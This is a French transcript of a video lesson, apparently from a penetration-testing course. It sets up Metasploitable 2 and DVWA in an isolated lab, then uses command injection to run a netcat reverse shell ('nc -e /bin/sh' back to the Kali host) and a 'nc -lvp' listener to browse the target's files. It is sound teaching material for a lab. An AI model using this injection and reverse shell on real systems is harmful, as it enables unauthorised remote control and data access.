Bonjour à vous tous, j'espère que vous allez bien. Alors, dans les deux dernières vidéos, on a vu en fait l'outil Netcat et cet outil en fait nous a permis donc de faire comment dire d'ouvrir en fait une session à partir de Kali sur Windows. Nous avons pu en fait contrôler la machine Windows à partir de Kali. Là, ce que je vais en fait essayer de faire, c'est de contrôler donc Netcat, de contrôler en fait une machine, une distribution en fait Linux. Pour ce faire, je vais télécharger une machine qui se nomme Metasploitable 2. Cette machine, en fait, Metasploitable 2, c'est une machine qui est vulnérable, qui est dédiée pour les tests d'intrusion, pour pouvoir comprendre et apprendre les différentes en fait exploits, différentes attaques, et de pouvoir en fait tester sur un environnement virtuel, pour ne pas en fait nuire à la vie privée des gens. Donc là, la communauté nous a donné en fait une machine qui est vulnérable, là rien que pour tester, pour apprendre et pour voir en fait les différentes en fait vulnérabilités. Donc là, vous pouvez passer sur ce lien. Une fois vous allez en fait télécharger donc le lien, il faut lire, il faut prendre le temps de lire, il faut comprendre de quoi il s'agit, qu'est-ce qu'on est en train de voir. Et bien évidemment, en fait, pour pouvoir se connecter à cette machine, il nous donne en fait le credential. Et là, ça prouve le fait que cette machine, c'est une machine vulnérable, donc le même login, le même password, MSF admin, MSF admin. Et là, ça nous permet en fait de se connecter à cette machine. Il ne faut pas qu'on expose en fait cette machine à un network qui n'est pas en fait sécurisé. Une fois que vous avez téléchargé cette machine, vous allez par la suite donc la mettre sur votre VirtualBox, Virtual Machine ou bien sur VMware comme euh, vous avez en fait l'habitude de travailler. Donc là, je vais tout d'abord euh, donc créer cette machine, Metasploitable, voilà, tac tac. Par la suite, je vais lui donner 1 giga, c'est largement suffisant. Créer un disque dur virtuel. Voilà, VI, taille fixe si vous voulez. Donc ça prend un tout petit peu de temps, donc 12 gigas c'est bon. Donc ça prend un tout petit peu de temps pour pouvoir en fait créer cette partie en fait de storage, et par la suite elle va nous donner en fait la main de pouvoir en fait la configurer, la paramétrer et de pouvoir en fait la lancer. Et donc là, le temps que ça s'installe, en fait l'idée en fait de notre vidéo, de notre donc formation dans cette vidéo, c'est de pouvoir ouvrir une session à partir en fait de Kali sur cette machine Metasploitable 2. D'accord? Donc juste je continue la configuration en fait de cette machine. Voilà, je passe au stockage et hop, j'ajoute en fait la machine, je passe à voilà, Metasploitable ou alors juste je vérifie. Donc là, c'est au niveau de download beaucoup plus, voilà. Et hop, donc vérifier la taille pour être sûr. Et là, juste aussi, donc là, faut pas qu'elle soit exposée à NAT. Donc là, ce que je vais en fait faire, c'est qu'elle soit en fait en réseau privé. Voilà, parce que j'aimerais bien qu'elle soit connectée à ma machine en fait Kali. Et normalement, le tour est joué. Donc là, la machine Kali, elle est toujours ouverte, normalement, Metasploitable 2, et aussi, elle va s'ouvrir, voilà, et elle va être démarrée normalement, voilà, sans aucun problème. On la laisse à côté, voilà, on la laisse à côté et on commence en fait notre menu. Donc juste là, si vous voulez, vous pouvez en fait, euh, comment dire, vous pouvez la rendre donc en une taille beaucoup plus visible. Donc là, pour ce faire, juste voilà, et hop. Donc je peux juste, alors je devrais avoir la main, voilà. Donc l'écran, là, vous pouvez en fait mettre un, alors 200, là, c'est largement suffisant pour qu'on puisse en fait pouvoir, pour qu'on puisse voir en fait l'écran. Voilà. La machine Kali, normalement, elle est aussi ouverte. Donc là, juste, je vérifie ma machine. Voilà. Tac, j'agrandis l'écran un tout petit peu. Donc là, elle, c'est, voilà. Alors, je garde ma machine ici. Voilà.
Voilà. Donc là, c'est vrai que c'est pas en fait facile en fait de pouvoir travailler sur des VM, surtout avec mon environnement de Mac. Donc là, mais ça passe. Alors, là, comme on a dit en fait, juste il suffit de faire MSF admin, MSF admin. Donc là, juste donc vous pouvez voir en fait qu'il est lancé en Kuwait. Donc là, juste faites attention pour pouvoir au tout début juste lancer donc voilà lancer euh, votre comment dire votre clavier. Par la suite, on peut en fait faire load fr. Voilà. Donc là, il va nous dire qu'il faut qu'elle soit en sudo. Hop, hop, et hop. MSF admin et le tour est joué normalement. Voilà. Très bien. Donc, juste, je vérifie mes adresses. Donc là, c'est la 19, donc la machine 19, ok. Et par la suite, je vais passer en fait à Kali. Donc on lance l'adresse en fait Metasploit table 2, donc c'est la point 19 comme on a dit. Et puis on va passer sur Kali. De même, on va essayer d'avoir l'adresse IP de Kali. Donc on ouvre un terminal et donc ce que je vais faire, donc, déjà je vais agrandir la taille en fait de mon terminal et puis hop IPA par exemple, là ça va nous donner euh, voilà l'adresse IP, donc c'est la pointe 17. Et ce que je vais en fait faire après, c'est lancer en fait un navigateur genre Firefox par exemple. Donc pour ce faire, donc juste Firefox et puis avoir accès en fait à la pointe, comme on a dit en fait la pointe 19. Donc, je vais passer sur 192.168.56.19 et puis, ce que je vais en fait avoir, c'est la machine Metasploitable 2 et avoir les 5 liens. Ce que je vais en fait faire pour cette vidéo, c'est le DVWA. DVWA, en fait, pour pouvoir y accéder, en fait, il suffit juste donc de faire appel à admin et password comme indiqué en bas de page. Donc, password. Voilà, et puis une fois on s'est logué, donc là, it's a damn vulnerable web application, comme son nom l'indique, et là, la première chose que je vais en fait faire avec vous, c'est le command execution. Donc, je vais juste faire une commande qui va être exécutée, qui va avoir accès en fait à la machine Metasploitable 2 à partir de Kali. Donc, pour ce faire, il faut passer au niveau de sécurité. Je vais mettre le niveau de sécurité à low pour pouvoir, comme on a fait avec Windows, on a désactivé en fait le firewall. Ici, on a aussi le même principe, c'est réduire en fait la sécurité, le niveau de sécurité de cette machine. Et par la suite, donc je vais passer en fait à cette input box et pouvoir en fait lancer donc la machine. Donc on a dit c'est la 192.168.56.19, c'est ça, c'est la machine donc Metasploitable 2 et puis NC pour le net4, -E pour exécuter et puis /bin/sh et puis par la suite faire appel à la machine Kali 192.168.56.17 et puis ouvrir en fait un port, le port 1, 2, 3, 4, 5, 6 par exemple. Ok. Et puis je lance en fait la communication et je vais passer par la suite à mon terminal. Donc je vais passer par la suite à mon terminal et après je vais ouvrir en fait le port DAC avec le NC-LVP, L pour dire listener, V pour dire verbose, le port c'est avec le P, et puis 1, 2, 3, 4, 5, 6 avec le port qui a été ouvert. Et puis la communication elle est faite et là quand je fais par exemple un simple ls, vous allez voir, enfin, ça peut prendre un tout petit peu de temps et là ça va nous afficher en fait le contenu du répertoire courant. Donc je vais passer à Metasploitable 2, voir le temps que ça réponde en fait. Je vais passer à Metasploitable 2 et je vais voir en fait le chemin. Donc là, je suis sur /home/msf admin par exemple, puis je vais par la suite voir le contenu, c'est
vulnerable, et par la suite je vais passer sur vulnerable et pouvoir avoir le contenu. Donc là vous voyez en fait il y a pas mal de répertoire là-dedans. Donc là essayez d'explorer en fait cette machine, essayez de voir qu'est-ce qu'on arrive en fait à pouvoir trouver dans cette machine pour pouvoir en fait euh, pour pouvoir bien en fait ficeler et bien avoir la main en fait sur cette machine. Une fois la machine elle a répondu, là après, quand vous voyez, en fait, vous pouvez passer par exemple à carrément, en fait, on peut faire un PWD pour voir quel est le chemin, voilà, vous voyez, et je peux en fait lister en fait le contenu, genre je peux faire par exemple cd slash home, voilà, voilà, slash home, slash MSF admin, MSF admin. Et puis, donc directement, vous voyez, en fait, après, on peut faire ls. Et là, on trouve, en fait, ce qu'on a vérifié, en fait, sur la machine Metasploitable 2. Donc, vous pouvez aussi accéder à Vulnerable. Et par la suite, voir aussi, donc, qu'est-ce qu'il y a là-dedans. Donc, on peut tout faire, en fait. Nous avons accès à cette machine et on peut, en fait, faire ce qu'on veut, en fait. Donc là, l'idée, en fait, c'est que euh, on a pu en fait faire accès en fait à cette machine sans aucun problème avec Netcat. Donc dans les prochaines en fait vidéos, on va essayer en fait de voir euh, en fait les uploads. On va travailler en fait avec un outil qui est un backdoor en fait avec Weebly et c'est aussi très intéressant en fait. Donc et à chaque fois, on va essayer de varier nos interventions avec les SQL, les XSS jusqu'à pouvoir en fait avoir à la fin en fait le framework Metasploitable. Donc merci pour votre attention et à la prochaine vidéo.